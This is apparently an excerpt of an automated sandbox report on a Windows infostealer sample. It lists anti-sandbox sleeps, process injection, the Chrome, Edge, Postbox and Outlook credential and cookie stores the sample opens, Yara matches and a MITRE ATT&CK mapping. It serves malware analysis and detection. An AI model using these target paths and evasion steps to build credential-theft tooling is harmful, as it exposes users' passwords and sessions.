                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -597328s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -597219s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -597098s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -596983s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -596872s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -596757s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -596643s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -596516s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -596405s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -596297s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -596187s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -596078s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -595969s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -595859s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -595750s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -595641s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -595531s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -595422s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -595313s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -595188s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -595063s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -594938s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -594828s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -594718s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -594609s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -594500s >= -30000s
                Source: UFOiZapHGS.exe, 00000001.00000002.3356413048.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Memory written: C:\Users\user\Desktop\UFOiZapHGS.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Process created: C:\Users\user\Desktop\UFOiZapHGS.exe "C:\Users\user\Desktop\UFOiZapHGS.exe"
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Queries volume information: C:\Users\user\Desktop\UFOiZapHGS.exe VolumeInformation
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Queries volume information: C:\Users\user\Desktop\UFOiZapHGS.exe VolumeInformation
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 00000001.00000002.3357879942.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: UFOiZapHGS.exe PID: 6596, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: UFOiZapHGS.exe PID: 6812, type: MEMORYSTR
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                Remote Access Functionality

                Source: Yara match | File source: 00000001.00000002.3357879942.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: UFOiZapHGS.exe PID: 6596, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: UFOiZapHGS.exe PID: 6812, type: MEMORYSTR
                MITRE ATT&CK matrix (the 14-column table was flattened by extraction; rebuilt here as one line per tactic, techniques listed in the report's row order; a leading number is the match counter exactly as it appears in the report, and techniques without a number carry no match counter):

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: 1 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 13 System Information Discovery; Remote System Discovery; System Owner/User Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: 1 Email Collection; 11 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: 1 Web Service; 11 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
